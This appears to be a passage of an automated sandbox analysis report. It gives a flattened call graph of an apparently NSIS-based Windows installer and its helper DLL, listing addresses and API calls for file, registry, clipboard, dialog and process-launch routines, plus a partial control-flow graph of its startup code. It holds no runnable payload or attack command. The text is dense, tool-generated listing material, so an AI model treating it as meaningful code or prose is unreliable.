4028e6 5528->5529 5530 4028ea FindNextFileW 5529->5530 5532 4028fc 5529->5532 5531 402943 5530->5531 5530->5532 5534 406668 lstrcpynW 5531->5534 5534->5532 5535 406d5f 5536 406be3 5535->5536 5537 40754e 5536->5537 5538 406c64 GlobalFree 5536->5538 5539 406c6d GlobalAlloc 5536->5539 5540 406ce4 GlobalAlloc 5536->5540 5541 406cdb GlobalFree 5536->5541 5538->5539 5539->5536 5539->5537 5540->5536 5540->5537 5541->5540 5542 724923e9 5543 72492453 5542->5543 5544 7249245e GlobalAlloc 5543->5544 5545 7249247d 5543->5545 5544->5543 5546 401563 5547 402ba4 5546->5547 5550 4065af wsprintfW 5547->5550 5549 402ba9 5550->5549 5551 407068 5555 406be3 5551->5555 5552 40754e 5553 406c64 GlobalFree 5554 406c6d GlobalAlloc 5553->5554 5554->5552 5554->5555 5555->5552 5555->5553 5555->5554 5555->5555 5556 406ce4 GlobalAlloc 5555->5556 5557 406cdb GlobalFree 5555->5557 5556->5552 5556->5555 5557->5556 5558 401968 5559 402d84 17 API calls 5558->5559 5560 40196f 5559->5560 5561 402d84 17 API calls 5560->5561 5562 40197c 5561->5562 5563 402da6 17 API calls 5562->5563 5564 401993 lstrlenW 5563->5564 5565 4019a4 5564->5565 5566 4019e5 5565->5566 5570 406668 lstrcpynW 5565->5570 5568 4019d5 5568->5566 5569 4019da lstrlenW 5568->5569 5569->5566 5570->5568 5571 724910e1 5581 72491111 5571->5581 5572 724912b0 GlobalFree 5573 724911d7 GlobalAlloc 5573->5581 5574 72491240 GlobalFree 5574->5581 5575 7249135a 2 API calls 5575->5581 5576 724912ab 5576->5572 5577 72491312 2 API calls 5577->5581 5578 7249129a GlobalFree 5578->5581 5579 72491381 lstrcpyW 5579->5581 5580 7249116b GlobalAlloc 5580->5581 5581->5572 5581->5573 5581->5574 5581->5575 5581->5576 5581->5577 5581->5578 5581->5579 5581->5580 5582 40166a 5583 402da6 17 API calls 5582->5583 5584 401670 5583->5584 5585 40699e 2 API calls 5584->5585 5586 401676 5585->5586 5587 402aeb 5588 402d84 17 API calls 5587->5588 5590 402af1 5588->5590 5589 4066a5 17 API calls 5591 40292e 5589->5591 5590->5589 5590->5591 5030 4026ec 5031 402d84 17 API calls 5030->5031 5034 4026fb 5031->5034 5032 402838 5033 402745 ReadFile 5033->5032 5033->5034 5034->5032 5034->5033 5035 4061db ReadFile 5034->5035 5036 4027de 5034->5036 5037 402785 MultiByteToWideChar 5034->5037 5038 40283a 5034->5038 5041 4027ab SetFilePointer MultiByteToWideChar 5034->5041 5042 40284b 5034->5042 5035->5034 5036->5032 5036->5034 5044 406239 SetFilePointer 5036->5044 5037->5034 5053 4065af wsprintfW 5038->5053 5041->5034 5042->5032 5043 40286c SetFilePointer 5042->5043 5043->5032 5045 406255 5044->5045 5048 40626d 5044->5048 5046 4061db ReadFile 5045->5046 5047 406261 5046->5047 5047->5048 5049 406276 SetFilePointer 5047->5049 5050 40629e SetFilePointer 5047->5050 5048->5036 5049->5050 5051 406281 5049->5051 5050->5048 5052 40620a WriteFile 5051->5052 5052->5048 5053->5032 5592 404a6e 5593 404aa4 5592->5593 5594 404a7e 5592->5594 5596 40462b 8 API calls 5593->5596 5595 4045c4 18 API calls 5594->5595 5597 404a8b SetDlgItemTextW 5595->5597 5598 404ab0 5596->5598 5597->5593 5054 40176f 5055 402da6 17 API calls 5054->5055 5056 401776 5055->5056 5057 401796 5056->5057 5058 40179e 5056->5058 5093 406668 lstrcpynW 5057->5093 5094 406668 lstrcpynW 5058->5094 5061 4017a9 5063 405f37 3 API calls 5061->5063 5062 40179c 5065 4068ef 5 API calls 5062->5065 5064 4017af lstrcatW 5063->5064 5064->5062 5080 4017bb 5065->5080 5066 40699e 2 API calls 5066->5080 5068 406133 2 API calls 5068->5080 5069 4017cd CompareFileTime 5069->5080 5070 40188d 5071 4056ca 24 API calls 5070->5071 5074 401897 5071->5074 5072 4056ca 24 API calls 5082 401879 5072->5082 5073 406668 lstrcpynW 5073->5080 5075 403371 44 API calls 5074->5075 5076 4018aa 5075->5076 5077 4018be SetFileTime 5076->5077 5079 4018d0 FindCloseChangeNotification 5076->5079 5077->5079 5078 4066a5 17 API calls 5078->5080 5081 4018e1 5079->5081 5079->5082 5080->5066 5080->5068 5080->5069 5080->5070 5080->5073 5080->5078 5088 405cc8 MessageBoxIndirectW 5080->5088 5091 401864 5080->5091 5092 406158 GetFileAttributesW CreateFileW 5080->5092 5083 4018e6 5081->5083 5084 4018f9 5081->5084 5085 4066a5 17 API calls 5083->5085 5086 4066a5 17 API calls 5084->5086 5087 4018ee lstrcatW 5085->5087 5089 401901 5086->5089 5087->5089 5088->5080 5089->5082 5090 405cc8 MessageBoxIndirectW 5089->5090 5090->5082 5091->5072 5091->5082 5092->5080 5093->5062 5094->5061 5599 72491979 5600 7249199c 5599->5600 5601 724919d1 GlobalFree 5600->5601 5602 724919e3 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5600->5602 5601->5602 5603 72491312 2 API calls 5602->5603 5604 72491b6e GlobalFree GlobalFree 5603->5604 5605 401a72 5606 402d84 17 API calls 5605->5606 5607 401a7b 5606->5607 5608 402d84 17 API calls 5607->5608 5609 401a20 5608->5609 5610 401573 5611 401583 ShowWindow 5610->5611 5612 40158c 5610->5612 5611->5612 5613 402c2a 5612->5613 5614 40159a ShowWindow 5612->5614 5614->5613 5145 4023f4 5146 402da6 17 API calls 5145->5146 5147 402403 5146->5147 5148 402da6 17 API calls 5147->5148 5149 40240c 5148->5149 5150 402da6 17 API calls 5149->5150 5151 402416 GetPrivateProfileStringW 5150->5151 5615 4014f5 SetForegroundWindow 5616 402c2a 5615->5616 5617 401ff6 5618 402da6 17 API calls 5617->5618 5619 401ffd 5618->5619 5620 40699e 2 API calls 5619->5620 5621 402003 5620->5621 5623 402014 5621->5623 5624 4065af wsprintfW 5621->5624 5624->5623 5625 401b77 5626 402da6 17 API calls 5625->5626 5627 401b7e 5626->5627 5628 402d84 17 API calls 5627->5628 5629 401b87 wsprintfW 5628->5629 5630 402c2a 5629->5630 5631 4046fa lstrcpynW lstrlenW 5632 40167b 5633 402da6 17 API calls 5632->5633 5634 401682 5633->5634 5635 402da6 17 API calls 5634->5635 5636 40168b 5635->5636 5637 402da6 17 API calls 5636->5637 5638 401694 MoveFileW 5637->5638 5639 4016a0 5638->5639 5640 4016a7 5638->5640 5641 401423 24 API calls 5639->5641 5642 40699e 2 API calls 5640->5642 5644 4022f6 5640->5644 5641->5644 5643 4016b6 5642->5643 5643->5644 5645 406428 36 API calls 5643->5645 5645->5639 5646 72491774 5647 724917a3 5646->5647 5648 72491bff 20 API calls 5647->5648 5649 724917aa 5648->5649 5650 724917bd 5649->5650 5651 724917b1 5649->5651 5652 724917e4 5650->5652 5653 724917c7 5650->5653 5654 72491312 2 API calls 5651->5654 5656 724917ea 5652->5656 5657 7249180e 5652->5657 5655 724915dd 3 API calls 5653->5655 5658 724917bb 5654->5658 5660 724917cc 5655->5660 5661 72491654 3 API calls 5656->5661 5659 724915dd 3 API calls 5657->5659 5659->5658 5662 72491654 3 API calls 5660->5662 5663 724917ef 5661->5663 5664 724917d2 5662->5664 5665 72491312 2 API calls 5663->5665 5666 72491312 2 API calls 5664->5666 5667 724917f5 GlobalFree 5665->5667 5668 724917d8 GlobalFree 5666->5668 5667->5658 5669 72491809 GlobalFree 5667->5669 5668->5658 5669->5658 5677 4022ff 5678 402da6 17 API calls 5677->5678 5679 402305 5678->5679 5680 402da6 17 API calls 5679->5680 5681 40230e 5680->5681 5682 402da6 17 API calls 5681->5682 5683 402317 5682->5683 5684 40699e 2 API calls 5683->5684 5685 402320 5684->5685 5686 402331 lstrlenW lstrlenW 5685->5686 5687 402324 5685->5687 5689 4056ca 24 API calls 5686->5689 5688 4056ca 24 API calls 5687->5688 5691 40232c 5687->5691 5688->5691 5690 40236f SHFileOperationW 5689->5690 5690->5687 5690->5691 5692 4019ff 5693 402da6 17 API calls 5692->5693 5694 401a06 5693->5694 5695 402da6 17 API calls 5694->5695 5696 401a0f 5695->5696 5697 401a16 lstrcmpiW 5696->5697 5698 401a28 lstrcmpW 5696->5698 5699 401a1c 5697->5699 5698->5699 5700 401000 5701 401037 BeginPaint GetClientRect 5700->5701 5702 40100c DefWindowProcW 5700->5702 5704 4010f3 5701->5704 5705 401179 5702->5705 5706 401073 CreateBrushIndirect FillRect DeleteObject 5704->5706 5707 4010fc 5704->5707 5706->5704 5708 401102 CreateFontIndirectW 5707->5708 5709 401167 EndPaint 5707->5709 5708->5709 5710 401112 6 API calls 5708->5710 5709->5705 5710->5709 5711 401d81 5712 401d94 GetDlgItem 5711->5712 5713 401d87 5711->5713 5715 401d8e 5712->5715 5714 402d84 17 API calls 5713->5714 5714->5715 5716 401dd5 GetClientRect LoadImageW SendMessageW 5715->5716 5717 402da6 17 API calls 5715->5717 5719 401e33 5716->5719 5721 401e3f 5716->5721 5717->5716 5720 401e38 DeleteObject 5719->5720 5719->5721 5720->5721 5722 401503 5723 40150b 5722->5723 5725 40151e 5722->5725 5724 402d84 17 API calls 5723->5724 5724->5725 5726 404783 5727 4048b5 5726->5727 5728 40479b 5726->5728 5729 40491f 5727->5729 5731 4049e9 5727->5731 5737 4048f0 GetDlgItem SendMessageW 5727->5737 5734 4045c4 18 API calls 5728->5734 5730 404929 GetDlgItem 5729->5730 5729->5731 5732 404943 5730->5732 5733 4049aa 5730->5733 5736 40462b 8 API calls 5731->5736 5732->5733 5740 404969 SendMessageW LoadCursorW SetCursor 5732->5740 5733->5731 5741 4049bc 5733->5741 5735 404802 5734->5735 5738 4045c4 18 API calls 5735->5738 5739 4049e4 5736->5739 5759 4045e6 KiUserCallbackDispatcher 5737->5759 5743 40480f CheckDlgButton 5738->5743 5763 404a32 5740->5763 5745 4049d2 5741->5745 5746 4049c2 SendMessageW 5741->5746 5757 4045e6 KiUserCallbackDispatcher 5743->5757 5745->5739 5751 4049d8 SendMessageW 5745->5751 5746->5745 5747 40491a 5760 404a0e 5747->5760 5751->5739 5752 40482d GetDlgItem 5758 4045f9 SendMessageW 5752->5758 5754 404843 SendMessageW 5755 404860 GetSysColor 5754->5755 5756 404869 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5754->5756 5755->5756 5756->5739 5757->5752 5758->5754 5759->5747 5761 404a21 SendMessageW 5760->5761 5762 404a1c 5760->5762 5761->5729 5762->5761 5766 405c8e ShellExecuteExW 5763->5766 5765 404998 LoadCursorW SetCursor 5765->5733 5766->5765 5767 402383 5768 40238a 5767->5768 5771 40239d 5767->5771 5769 4066a5 17 API calls 5768->5769 5770 402397 5769->5770 5770->5771 5772 405cc8 MessageBoxIndirectW 5770->5772 5772->5771 5773 7249170d 5774 724915b6 GlobalFree 5773->5774 5776 72491725 5774->5776 5775 7249176b GlobalFree 5776->5775 5777 72491740 5776->5777 5778 72491757 VirtualFree 5776->5778 5777->5775 5778->5775 5779 402c05 SendMessageW 5780 402c2a 5779->5780 5781 402c1f InvalidateRect 5779->5781 5781->5780 4938 405809 4939 4059b3 4938->4939 4940 40582a GetDlgItem GetDlgItem GetDlgItem 4938->4940 4942 4059e4 4939->4942 4943 4059bc GetDlgItem CreateThread FindCloseChangeNotification 4939->4943 4984 4045f9 SendMessageW 4940->4984 4944 405a0f 4942->4944 4945 405a34 4942->4945 4946 4059fb ShowWindow ShowWindow 4942->4946 4943->4942 4987 40579d 5 API calls 4943->4987 4947 405a1b 4944->4947 4948 405a6f 4944->4948 4954 40462b 8 API calls 4945->4954 4986 4045f9 SendMessageW 4946->4986 4952 405a23 4947->4952 4953 405a49 ShowWindow 4947->4953 4948->4945 4957 405a7d SendMessageW 4948->4957 4949 40589a 4950 4058a1 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4949->4950 4955 4058f3 SendMessageW SendMessageW 4950->4955 4956 40590f 4950->4956 4958 40459d SendMessageW 4952->4958 4960 405a69 4953->4960 4961 405a5b 4953->4961 4959 405a42 4954->4959 4955->4956 4962 405922 4956->4962 4963 405914 SendMessageW 4956->4963 4957->4959 4964 405a96 CreatePopupMenu 4957->4964 4958->4945 4966 40459d SendMessageW 4960->4966 4965 4056ca 24 API calls 4961->4965 4968 4045c4 18 API calls 4962->4968 4963->4962 4967 4066a5 17 API calls 4964->4967 4965->4960 4966->4948 4969 405aa6 AppendMenuW 4967->4969 4970 405932 4968->4970 4971 405ac3 GetWindowRect 4969->4971 4972 405ad6 TrackPopupMenu 4969->4972 4973 40593b ShowWindow 4970->4973 4974 40596f GetDlgItem SendMessageW 4970->4974 4971->4972 4972->4959 4975 405af1 4972->4975 4976 405951 ShowWindow 4973->4976 4977 40595e 4973->4977 4974->4959 4978 405996 SendMessageW SendMessageW 4974->4978 4979 405b0d SendMessageW 4975->4979 4976->4977 4985 4045f9 SendMessageW 4977->4985 4978->4959 4979->4979 4980 405b2a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4979->4980 4982 405b4f SendMessageW 4980->4982 4982->4982 4983 405b78 GlobalUnlock SetClipboardData CloseClipboard 4982->4983 4983->4959 4984->4949 4985->4974 4986->4944 5782 72491000 5785 7249101b 5782->5785 5786 724915b6 GlobalFree 5785->5786 5787 72491020 5786->5787 5788 72491024 5787->5788 5789 72491027 GlobalAlloc 5787->5789 5790 724915dd 3 API calls 5788->5790 5789->5788 5791 72491019 5790->5791 5005 40248a 5006 402da6 17 API calls 5005->5006 5007 40249c 5006->5007 5008 402da6 17 API calls 5007->5008 5009 4024a6 5008->5009 5022 402e36 5009->5022 5012 4024de 5015 4024ea 5012->5015 5017 402d84 17 API calls 5012->5017 5013 402c2a 5014 402da6 17 API calls 5016 4024d4 lstrlenW 5014->5016 5018 402509 RegSetValueExW 5015->5018 5019 403371 44 API calls 5015->5019 5016->5012 5017->5015 5020 40251f RegCloseKey 5018->5020 5019->5018 5020->5013 5023 402e51 5022->5023 5026 406503 5023->5026 5027 406512 5026->5027 5028 4024b6 5027->5028 5029 40651d RegCreateKeyExW 5027->5029 5028->5012 5028->5013 5028->5014 5029->5028 5792 404e0b 5793 404e37 5792->5793 5794 404e1b 5792->5794 5795 404e6a 5793->5795 5796 404e3d SHGetPathFromIDListW 5793->5796 5803 405cac GetDlgItemTextW 5794->5803 5798 404e4d 5796->5798 5802 404e54 SendMessageW 5796->5802 5800 40140b 2 API calls 5798->5800 5799 404e28 SendMessageW 5799->5793 5800->5802 5802->5795 5803->5799 5804 40290b 5805 402da6 17 API calls 5804->5805 5806 402912 FindFirstFileW 5805->5806 5807 402925 5806->5807 5808 40293a 5806->5808 5809 402943 5808->5809 5812 4065af wsprintfW 5808->5812 5813 406668 lstrcpynW 5809->5813 5812->5809 5813->5807 5814 40190c 5815 401943 5814->5815 5816 402da6 17 API calls 5815->5816 5817 401948 5816->5817 5818 405d74 67 API calls 5817->5818 5819 401951 5818->5819 5820 40190f 5821 402da6 17 API calls 5820->5821 5822 401916 5821->5822 5823 405cc8 MessageBoxIndirectW 5822->5823 5824 40191f 5823->5824 5095 402891 5096 402898 5095->5096 5097 402ba9 5095->5097 5098 402d84 17 API calls 5096->5098 5099 40289f 5098->5099 5100 4028ae SetFilePointer 5099->5100 5100->5097 5101 4028be 5100->5101 5103 4065af wsprintfW 5101->5103 5103->5097 5825 401491 5826 4056ca 24 API calls 5825->5826 5827 401498 5826->5827 5828 401f12 5829 402da6 17 API calls 5828->5829 5830 401f18 5829->5830 5831 402da6 17 API calls 5830->5831 5832 401f21 5831->5832 5833 402da6 17 API calls 5832->5833 5834 401f2a 5833->5834 5835 402da6 17 API calls 5834->5835 5836 401f33 5835->5836 5837 401423 24 API calls 5836->5837 5838 401f3a 5837->5838 5845 405c8e ShellExecuteExW 5838->5845 5840 401f82 5841 406ae0 5 API calls 5840->5841 5842 40292e 5840->5842 5843 401f9f CloseHandle 5841->5843 5843->5842 5845->5840 5846 402f93 5847 402fa5 SetTimer 5846->5847 5848 402fbe 5846->5848 5847->5848 5849 40300c 5848->5849 5850 403012 MulDiv 5848->5850 5851 402fcc wsprintfW SetWindowTextW SetDlgItemTextW 5850->5851 5851->5849 5867 401d17 5868 402d84 17 API calls 5867->5868 5869 401d1d IsWindow 5868->5869 5870 401a20 5869->5870 5343 401b9b 5344 401ba8 5343->5344 5345 401bec 5343->5345 5346 401c31 5344->5346 5351 401bbf 5344->5351 5347 401bf1 5345->5347 5348 401c16 GlobalAlloc 5345->5348 5349 4066a5 17 API calls 5346->5349 5361 40239d 5346->5361 5347->5361 5364 406668 lstrcpynW 5347->5364 5350 4066a5 17 API calls 5348->5350 5352 402397 5349->5352 5350->5346 5362 406668 lstrcpynW 5351->5362 5357 405cc8 MessageBoxIndirectW 5352->5357 5352->5361 5355 401c03 GlobalFree 5355->5361 5356 401bce 5363 406668 lstrcpynW 5356->5363 5357->5361 5359 401bdd 5365 406668 lstrcpynW 5359->5365 5362->5356 5363->5359 5364->5355 5365->5361 5871 40261c 5872 402da6 17 API calls 5871->5872 5873 402623 5872->5873 5876 406158 GetFileAttributesW CreateFileW 5873->5876 5875 40262f 5876->5875 5380 40259e 5381 402de6 17 API calls 5380->5381 5382 4025a8 5381->5382 5383 402d84 17 API calls 5382->5383 5384 4025b1 5383->5384 5385 4025d9 RegEnumValueW 5384->5385 5386 4025cd RegEnumKeyW 5384->5386 5388 40292e 5384->5388 5387 4025ee RegCloseKey 5385->5387 5386->5387 5387->5388 5884 40149e 5885 4014ac PostQuitMessage 5884->5885 5886 40239d 5884->5886 5885->5886 4817 4015a3 4818 402da6 17 API calls 4817->4818 4819 4015aa SetFileAttributesW 4818->4819 4820 4015bc 4819->4820 4821 401fa4 4822 402da6 17 API calls 4821->4822 4823 401faa 4822->4823 4824 4056ca 24 API calls 4823->4824 4825 401fb4 4824->4825 4826 405c4b 2 API calls 4825->4826 4827 401fba 4826->4827 4830 40292e 4827->4830 4834 401fdd CloseHandle 4827->4834 4836 406ae0 WaitForSingleObject 4827->4836 4831 401fcf 4832 401fd4 4831->4832 4833 401fdf 4831->4833 4841 4065af wsprintfW 4832->4841 4833->4834 4834->4830 4837 406afa 4836->4837 4838 406b0c GetExitCodeProcess 4837->4838 4839 406a71 2 API calls 4837->4839 4838->4831 4840 406b01 WaitForSingleObject 4839->4840 4840->4837 4841->4834 4988 40252a 4999 402de6 4988->4999 4991 402da6 17 API calls 4992 40253d 4991->4992 4993 402548 RegQueryValueExW 4992->4993 4996 40292e 4992->4996 4994 40256e RegCloseKey 4993->4994 4995 402568 4993->4995 4994->4996 4995->4994 5004 4065af wsprintfW 4995->5004 5000 402da6 17 API calls 4999->5000 5001 402dfd 5000->5001 5002 4064d5 RegOpenKeyExW 5001->5002 5003 402534 5002->5003 5003->4991 5004->4994 5887 40202a 5888 402da6 17 API calls 5887->5888 5889 402031 5888->5889 5890 406a35 5 API calls 5889->5890 5891 402040 5890->5891 5892 4020cc 5891->5892 5893 40205c GlobalAlloc 5891->5893 5893->5892 5894 402070 5893->5894 5895 406a35 5 API calls 5894->5895 5896 402077 5895->5896 5897 406a35 5 API calls 5896->5897 5898 402081 5897->5898 5898->5892 5902 4065af wsprintfW 5898->5902 5900 4020ba 5903 4065af wsprintfW 5900->5903 5902->5900 5903->5892 5904 4021aa 5905 402da6 17 API calls 5904->5905 5906 4021b1 5905->5906 5907 402da6 17 API calls 5906->5907 5908 4021bb 5907->5908 5909 402da6 17 API calls 5908->5909 5910 4021c5 5909->5910 5911 402da6 17 API calls 5910->5911 5912 4021cf 5911->5912 5913 402da6 17 API calls 5912->5913 5914 4021d9 5913->5914 5915 402218 CoCreateInstance 5914->5915 5916 402da6 17 API calls 5914->5916 5919 402237 5915->5919 5916->5915 5917 401423 24 API calls 5918 4022f6 5917->5918 5919->5917 5919->5918 5927 401a30 5928 402da6 17 API calls 5927->5928 5929 401a39 ExpandEnvironmentStringsW 5928->5929 5930 401a4d 5929->5930 5932 401a60 5929->5932 5931 401a52 lstrcmpW 5930->5931 5930->5932 5931->5932 5933 405031 GetDlgItem GetDlgItem 5934 405083 7 API calls 5933->5934 5940 4052a8 5933->5940 5935 40512a DeleteObject 5934->5935 5936 40511d SendMessageW 5934->5936 5937 405133 5935->5937 5936->5935 5938 40516a 5937->5938 5941 4066a5 17 API calls 5937->5941 5942 4045c4 18 API calls 5938->5942 5939 40538a 5943 405436 5939->5943 5953 4053e3 SendMessageW 5939->5953 5973 40529b 5939->5973 5940->5939 5948 405317 5940->5948 5987 404f7f SendMessageW 5940->5987 5946 40514c SendMessageW SendMessageW 5941->5946 5947 40517e 5942->5947 5944 405440 SendMessageW 5943->5944 5945 405448 5943->5945 5944->5945 5955 405461 5945->5955 5956 40545a ImageList_Destroy 5945->5956 5963 405471 5945->5963 5946->5937 5952 4045c4 18 API calls 5947->5952 5948->5939 5949 40537c SendMessageW 5948->5949 5949->5939 5950 40462b 8 API calls 5954 405637 5950->5954 5967 40518f 5952->5967 5958 4053f8 SendMessageW 5953->5958 5953->5973 5959 40546a GlobalFree 5955->5959 5955->5963 5956->5955 5957 4055eb 5964 4055fd ShowWindow GetDlgItem ShowWindow 5957->5964 5957->5973 5961 40540b 5958->5961 5959->5963 5960 40526a GetWindowLongW SetWindowLongW 5962 405283 5960->5962 5972 40541c SendMessageW 5961->5972 5965 4052a0 5962->5965 5966 405288 ShowWindow 5962->5966 5963->5957 5978 4054ac 5963->5978 5992 404fff 5963->5992 5964->5973 5986 4045f9 SendMessageW 5965->5986 5985 4045f9 SendMessageW 5966->5985 5967->5960 5968 405265 5967->5968 5971 4051e2 SendMessageW 5967->5971 5974 405220 SendMessageW 5967->5974 5975 405234 SendMessageW 5967->5975 5968->5960 5968->5962 5971->5967 5972->5943 5973->5950 5974->5967 5975->5967 5977 4055b6 5979 4055c1 InvalidateRect 5977->5979 5982 4055cd 5977->5982 5980 4054da SendMessageW 5978->5980 5981 4054f0 5978->5981 5979->5982 5980->5981 5981->5977 5983 405564 SendMessageW SendMessageW 5981->5983 5982->5957 6001 404f3a 5982->6001 5983->5981 5985->5973 5986->5940 5988 404fa2 GetMessagePos ScreenToClient SendMessageW 5987->5988 5989 404fde SendMessageW 5987->5989 5990 404fd6 5988->5990 5991 404fdb 5988->5991 5989->5990 5990->5948 5991->5989 6004 406668 lstrcpynW 5992->6004 5994 405012 6005 4065af wsprintfW 5994->6005 5996 40501c 5997 40140b 2 API calls 5996->5997 5998 405025 5997->5998 6006 406668 lstrcpynW 5998->6006 6000 40502c 6000->5978 6007 404e71 6001->6007 6003 404f4f 6003->5957 6004->5994 6005->5996 6006->6000 6008 404e8a 6007->6008 6009 4066a5 17 API calls 6008->6009 6010 404eee 6009->6010 6011 4066a5 17 API calls 6010->6011 6012 404ef9 6011->6012 6013 4066a5 17 API calls 6012->6013 6014 404f0f lstrlenW wsprintfW SetDlgItemTextW 6013->6014 6014->6003 5104 4023b2 5105 4023c0 5104->5105 5106 4023ba 5104->5106 5108 4023ce 5105->5108 5109 402da6 17 API calls 5105->5109 5107 402da6 17 API calls 5106->5107 5107->5105 5110 4023dc 5108->5110 5111 402da6 17 API calls 5108->5111 5109->5108 5112 402da6 17 API calls 5110->5112 5111->5110 5113 4023e5 WritePrivateProfileStringW 5112->5113 5114 402434 5115 402467 5114->5115 5116 40243c 5114->5116 5118 402da6 17 API calls 5115->5118 5117 402de6 17 API calls 5116->5117 5119 402443 5117->5119 5120 40246e 5118->5120 5121 40244d 5119->5121 5125 40247b 5119->5125 5126 402e64 5120->5126 5123 402da6 17 API calls 5121->5123 5124 402454 RegDeleteValueW RegCloseKey 5123->5124 5124->5125 5127 402e71 5126->5127 5128 402e78 5126->5128 5127->5125 5128->5127 5130 402ea9 5128->5130 5131 4064d5 RegOpenKeyExW 5130->5131 5132 402ed7 5131->5132 5133 402ee1 5132->5133 5134 402f8c 5132->5134 5135 402ee7 RegEnumValueW 5133->5135 5140 402f0a 5133->5140 5134->5127 5136 402f71 RegCloseKey 5135->5136 5135->5140 5136->5134 5137 402f46 RegEnumKeyW 5138 402f4f RegCloseKey 5137->5138 5137->5140 5139 406a35 5 API calls 5138->5139 5142 402f5f 5139->5142 5140->5136 5140->5137 5140->5138 5141 402ea9 6 API calls 5140->5141 5141->5140 5143 402f81 5142->5143 5144 402f63 RegDeleteKeyW 5142->5144 5143->5134 5144->5134 6020 7249103d 6021 7249101b 5 API calls 6020->6021 6022 72491056 6021->6022 6023 404734 lstrlenW 6024 404753 6023->6024 6025 404755 WideCharToMultiByte 6023->6025 6024->6025 6026 401735 6027 402da6 17 API calls 6026->6027 6028 40173c SearchPathW 6027->6028 6029 401757 6028->6029 6030 404ab5 6031 404ae1 6030->6031 6032 404af2 6030->6032 6091 405cac GetDlgItemTextW 6031->6091 6034 404afe GetDlgItem 6032->6034 6040 404b5d 6032->6040 6036 404b12 6034->6036 6035 404aec 6038 4068ef 5 API calls 6035->6038 6039 404b26 SetWindowTextW 6036->6039 6044 405fe2 4 API calls 6036->6044 6037 404c41 6041 404df0 6037->6041 6093 405cac GetDlgItemTextW 6037->6093 6038->6032 6045 4045c4 18 API calls 6039->6045 6040->6037 6040->6041 6046 4066a5 17 API calls 6040->6046 6043 40462b 8 API calls 6041->6043 6048 404e04 6043->6048 6049 404b1c 6044->6049 6050 404b42 6045->6050 6051 404bd1 SHBrowseForFolderW 6046->6051 6047 404c71 6052 40603f 18 API calls 6047->6052 6049->6039 6058 405f37 3 API calls 6049->6058 6053 4045c4 18 API calls 6050->6053 6051->6037 6054 404be9 CoTaskMemFree 6051->6054 6055 404c77 6052->6055 6056 404b50 6053->6056 6057 405f37 3 API calls 6054->6057 6094 406668 lstrcpynW 6055->6094 6092 4045f9 SendMessageW 6056->6092 6060 404bf6 6057->6060 6058->6039 6063 404c2d SetDlgItemTextW 6060->6063 6067 4066a5 17 API calls 6060->6067 6062 404b56 6065 406a35 5 API calls 6062->6065 6063->6037 6064 404c8e 6066 406a35 5 API calls 6064->6066 6065->6040 6074 404c95 6066->6074 6068 404c15 lstrcmpiW 6067->6068 6068->6063 6071 404c26 lstrcatW 6068->6071 6069 404cd6 6095 406668 lstrcpynW 6069->6095 6071->6063 6072 404cdd 6073 405fe2 4 API calls 6072->6073 6075 404ce3 GetDiskFreeSpaceW 6073->6075 6074->6069 6078 405f83 2 API calls 6074->6078 6080 404d2e 6074->6080 6077 404d07 MulDiv 6075->6077 6075->6080 6077->6080 6078->6074 6079 404d9f 6082 404dc2 6079->6082 6084 40140b 2 API calls 6079->6084 6080->6079 6081 404f3a 20 API calls 6080->6081 6083 404d8c 6081->6083 6096 4045e6 KiUserCallbackDispatcher 6082->6096 6085 404da1 SetDlgItemTextW 6083->6085 6086 404d91 6083->6086 6084->6082 6085->6079 6089 404e71 20 API calls 6086->6089 6088 404dde 6088->6041 6090 404a0e SendMessageW 6088->6090 6089->6079 6090->6041 6091->6035 6092->6062 6093->6047 6094->6064 6095->6072 6096->6088 6097 401d38 6098 402d84 17 API calls 6097->6098 6099 401d3f 6098->6099 6100 402d84 17 API calls 6099->6100 6101 401d4b GetDlgItem 6100->6101 6102 402638 6101->6102 6103 4014b8 6104 4014be 6103->6104 6105 401389 2 API calls 6104->6105 6106 4014c6 6105->6106 6107 40563e 6108 405662 6107->6108 6109 40564e 6107->6109 6112 40566a IsWindowVisible 6108->6112 6118 405681 6108->6118 6110 405654 6109->6110 6111 4056ab 6109->6111 6114 404610 SendMessageW 6110->6114 6113 4056b0 CallWindowProcW 6111->6113 6112->6111 6115 405677 6112->6115 6116 40565e 6113->6116 6114->6116 6117 404f7f 5 API calls 6115->6117 6117->6118 6118->6113 6119 404fff 4 API calls 6118->6119 6119->6111 6120 40263e 6121 402652 6120->6121 6122 40266d 6120->6122 6123 402d84 17 API calls 6121->6123 6124 402672 6122->6124 6125 40269d 6122->6125 6134 402659 6123->6134 6127 402da6 17 API calls 6124->6127 6126 402da6 17 API calls 6125->6126 6128 4026a4 lstrlenW 6126->6128 6129 402679 6127->6129 6128->6134 6137 40668a WideCharToMultiByte 6129->6137 6131 40268d lstrlenA 6131->6134 6132 4026e7 6133 4026d1 6133->6132 6135 40620a WriteFile 6133->6135 6134->6132 6134->6133 6136 406239 5 API calls 6134->6136 6135->6132 6136->6133 6137->6131

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 0 403640-403690 SetErrorMode GetVersionExW 1 403692-4036c6 GetVersionExW 0->1 2 4036ca-4036d1 0->2 1->2 3 4036d3 2->3 4 4036db-40371b 2->4 3->4 5 40371d-403725 call 406a35 4->5 6 40372e 4->6 5->6 11 403727 5->11 8 403733-403747 call 4069c5 lstrlenA 6->8 13 403749-403765 call 406a35 * 3 8->13 11->6 20 403776-4037d8 #17 OleInitialize SHGetFileInfoW call 406668 GetCommandLineW call 406668 13->20 21 403767-40376d 13->21 28 4037e1-4037f4 call 405f64 CharNextW 20->28 29 4037da-4037dc 20->29 21->20 25 40376f 21->25 25->20 32 4038eb-4038f1 28->32 29->28 33 4038f7 32->33 34 4037f9-4037ff 32->34 37 40390b-403925 GetTempPathW call 40360f 33->37 35 403801-403806 34->35 36 403808-40380e 34->36 35->35 35->36 38 403810-403814 36->38 39 403815-403819 36->39 47 403927-403945 GetWindowsDirectoryW lstrcatW call 40360f 37->47 48 40397d-403995 DeleteFileW call 4030d0 37->48 38->39 41 4038d9-4038e7 call 405f64 39->41 42 40381f-403825 39->42 41->32 58 4038e9-4038ea 41->58 45 403827-40382e 42->45 46 40383f-403878 42->46 51 403830-403833 45->51 52 403835 45->52 53 403894-4038ce 46->53 54 40387a-40387f 46->54 47->48 62 403947-403977 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40360f 